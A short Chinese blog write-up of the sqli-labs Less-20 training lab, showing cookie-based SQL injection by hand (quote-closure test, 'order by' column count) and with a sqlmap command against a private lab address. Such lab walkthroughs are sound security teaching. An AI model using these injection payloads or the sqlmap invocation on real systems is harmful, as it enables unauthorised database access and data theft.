这一关主要是cookie注入
Less-20(POST - Cookie Injection - Uagent field - error based)
手工注入
注意这关需要提前登入。
![](https://img-blog.csdnimg.cn/img_convert/9717b983ca5fa7453c865c2438388c74.png)
登入完后,需要抓包直接修改cookie。
![](https://img-blog.csdnimg.cn/img_convert/492fd87222ed61bfbdf53a36aa64e3cc.png)
检测闭合方式
Cookie: uname=admin'
![](https://img-blog.csdnimg.cn/img_convert/e5b16c7248c392250a5462ffbc71cffe.png)
![](https://img-blog.csdnimg.cn/img_convert/a080099b87e84f85fe5baa7634af111c.png)
报错了能直接判断单引号闭合。
接下来直接联合搜索完成。
回显位
cookie:uname = uname=admin' order by 2 #
![](https://img-blog.csdnimg.cn/img_convert/8aa65e8cf42adae015cab742992c4a51.png)
接下来直接和之前一样了
(2条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客
自动化脚本注入
sqlmap.py -u http://192.168.221.131/sqli/Less-20/index.php --cookie="uname=admin" --dbs --level 5 --batch
![](https://img-blog.csdnimg.cn/img_convert/6f8c6cffaaa6321f630284537b42dd1b.png)
其他的就是一样了